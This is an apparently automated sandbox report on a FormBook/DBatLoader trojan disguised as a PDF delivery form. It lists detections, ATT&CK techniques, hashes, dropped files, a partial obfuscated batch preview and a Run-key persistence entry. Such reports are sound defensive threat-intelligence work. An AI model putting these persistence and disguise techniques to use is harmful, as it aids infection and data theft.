Source: Yara match	File source: 5.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 18.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	411 Process Injection	1 Access Token Manipulation	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	2 Virtualization/Sandbox Evasion	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	411 Process Injection	LSA Secrets	1 System Network Connections Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	35 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	54%	Virustotal		Browse
Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	58%	ReversingLabs	Win32.Trojan.ModiLoader
Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	100%	Avira	HEUR/AGEN.1326052
Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\Cpbxcxnx.PIF	100%	Avira	HEUR/AGEN.1326052
C:\Users\Public\Libraries\Cpbxcxnx.PIF	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Cpbxcxnx.PIF	58%	ReversingLabs	Win32.Trojan.ModiLoader
C:\Users\Public\Libraries\xnxcxbpC.pif	3%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://www.pmail.com0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	172.217.17.46	true	false		high
drive.usercontent.google.com	172.217.17.65	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.000000000086E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2242116255.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.pmail.com0	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2239714955.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290541272.00000000221B0000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, xnxcxbpC.pif.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.17.46	drive.google.com	United States		15169	GOOGLEUS	false
172.217.17.65	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578035
Start date and time:	2024-12-19 07:56:59 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@21/7@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 69 Number of non-executed functions: 257
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:57:51	API Interceptor	2x Sleep call for process: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe modified
01:58:13	API Interceptor	4x Sleep call for process: Cpbxcxnx.PIF modified
01:58:38	API Interceptor	9x Sleep call for process: xnxcxbpC.pif modified
07:58:04	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cpbxcxnx C:\Users\Public\Cpbxcxnx.url
07:58:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cpbxcxnx C:\Users\Public\Cpbxcxnx.url

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	469oyXQbRY.exe	Get hash	malicious	LummaC	Browse	172.217.17.65 172.217.17.46
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS	Browse	172.217.17.65 172.217.17.46
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	172.217.17.65 172.217.17.46
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	172.217.17.65 172.217.17.46
	https://d2kjcgrb1q4xt7.cloudfront.net/mULiCoBDj2Ug.exe	Get hash	malicious	Unknown	Browse	172.217.17.65 172.217.17.46
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig	Browse	172.217.17.65 172.217.17.46
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	172.217.17.65 172.217.17.46
	rK0CtrtVrl.exe	Get hash	malicious	LummaC, Stealc	Browse	172.217.17.65 172.217.17.46
	NHEXQatKdE.exe	Get hash	malicious	LummaC	Browse	172.217.17.65 172.217.17.46
	CefJcYwgWs.exe	Get hash	malicious	LummaC, Stealc	Browse	172.217.17.65 172.217.17.46

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\xnxcxbpC.pif	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	qDKTsL1y44.exe	Get hash	malicious	DBatLoader	Browse
	PRODUCT.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	purchaseorder.bat	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	PO11550.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse
	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Get hash	malicious	AgentTesla, DBatLoader, RedLine	Browse
	PCMNil7wkU.exe	Get hash	malicious	AgentTesla, AsyncRAT, DBatLoader, RedLine	Browse
	tTIYCp2sf4.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse

Created / dropped Files

C:\Users\Public\Cpbxcxnx.url

Download File

Process:	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cpbxcxnx.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.089863219233713
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMBpTsbx2Zvol:HRYFVmTWDyzUTEx2Wl
MD5:	A38CEDA2F3FC58DB1F5F0E68804755D0
SHA1:	883C2DB76BE4E6937939FC9EE8CCCA6300FF8975
SHA-256:	BB300AAE00663AB1266B5CD81AAD4E61B56E78157B5E5BE4F1F5A5DC40BFE3F9
SHA-512:	393D97E2F175C48BF0156021B96D9DB0B3ADFDCEBEABE038707B70C507B011C2B2D3D1530605636809620F3CE21288DF97469C2C1630B8343784DA1498EDF655
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cpbxcxnx.PIF"..IconIndex=965829..HotKey=52..

C:\Users\Public\CpbxcxnxF.cmd

Download File

Process:	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
File Type:	DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15789
Entropy (8bit):	4.658965888116939
Encrypted:	false
SSDEEP:	384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
MD5:	CCE3C4AEE8C122DD8C44E64BD7884D83
SHA1:	C555C812A9145E2CBC66C7C64BA754B0C7528D6D
SHA-256:	4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
SHA-512:	EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
Malicious:	false
Preview:	.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

C:\Users\Public\Libraries\Cpbxcxnx

Download File

Process:	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	615395
Entropy (8bit):	7.3853484120868185
Encrypted:	false
SSDEEP:	12288:7oyblf23a+m2mKdQw+w+h/tIISwIMn0h8OYRBl3VjUcSxxi1nHW8:7oyFgaSm4Qw6/tI/A0fYXvjUtxs1nZ
MD5:	57636B438B4A5EAA59EF20CD03F828E6
SHA1:	30518895F5ECA780C0E413CE3698C844E0571138
SHA-256:	9D47DAF2B17AE1B1647B755975365D0FE9B81297F2DCD0A3C687FE010D44C020
SHA-512:	7B36C85776C51CF16927E54C89B47E84220AE257D18C825F71DFE9EF85B0138B62323A6C7F23F3515A12FEA0B5F32B2EEEA63BF76497CA8307E8FA9291E48739
Malicious:	true
Preview:	...Y#..K........!'.......''%'."%....%........%....Y#..KN..%.%.%$.....Y#..Kfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun]]_]nj_gg{l_slymv{fe_rfstyvnrfk]yupeuun....rd\$>-YeE..w..1.[_..C..<......B..:.!0.g=...!.................P.m.`[..1J....g...%.p..)...N..;....].../v..._.8w...!.-E.\

C:\Users\Public\Libraries\Cpbxcxnx.PIF

Download File

Process:	C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1362944
Entropy (8bit):	7.343935115196535
Encrypted:	false
